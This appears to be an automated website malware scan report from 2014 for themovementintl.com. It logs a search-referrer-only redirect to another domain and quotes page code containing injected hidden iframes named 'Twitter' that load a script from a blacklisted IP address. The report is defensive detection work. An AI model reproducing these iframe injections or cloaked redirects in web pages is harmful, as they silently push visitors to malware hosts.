Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://themovementintl.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: themovementintl.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 18 Sep 2014 16:25:27 GMT Location: http://hecodat.de/zwmd.html?h=583545 Server: Apache Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
| Request | Server response | Status |
http://themovementintl.com/ | 200 OK Content-Length: 2522 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[2734 bytes skipped]... /> var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <iframe name=Twitter scrolling=auto frameborder=no align=center height=1 width=32 src=http://176.31.24.102/post.php?id=606916></iframe></body> </html> Malicious iFrame found. size: 32x1 src: http://176.31.24.102/post.php?id=606916 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=1 width=32 src=http://176.31.24.102/post.php?id=606916> | ||
http://themovementintl.com/video.html | 200 OK Content-Length: 1405 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[1192 bytes skipped]... > var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <iframe name=Twitter scrolling=auto frameborder=no align=center height=33 width=14 src=http://176.31.24.102/post.php?id=606916></iframe></body> </html> Malicious iFrame found. size: 14x33 src: http://176.31.24.102/post.php?id=606916 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=33 width=14 src=http://176.31.24.102/post.php?id=606916> | ||
http://themovementintl.com/test404page.js | 404 Not Found Content-Length: 1680 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[1680 bytes skipped]... li> <li> 2) The link you used to get here is faulty. </li> <li class="last"> (It's an excellent idea to let the link owner know.) </li> </ol> </div> </div> </div> </div> <iframe name=Twitter scrolling=auto frameborder=no align=center height=55 width=61 src=http://176.31.24.102/post.php?id=606916></iframe></body> </html> Malicious iFrame found. size: 61x55 src: http://176.31.24.102/post.php?id=606916 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=55 width=61 src=http://176.31.24.102/post.php?id=606916> | ||
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=themovementintl.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://themovementintl.com/
Result: themovementintl.com is not infected or malware details are not published yet.
Result: themovementintl.com is not infected or malware details are not published yet.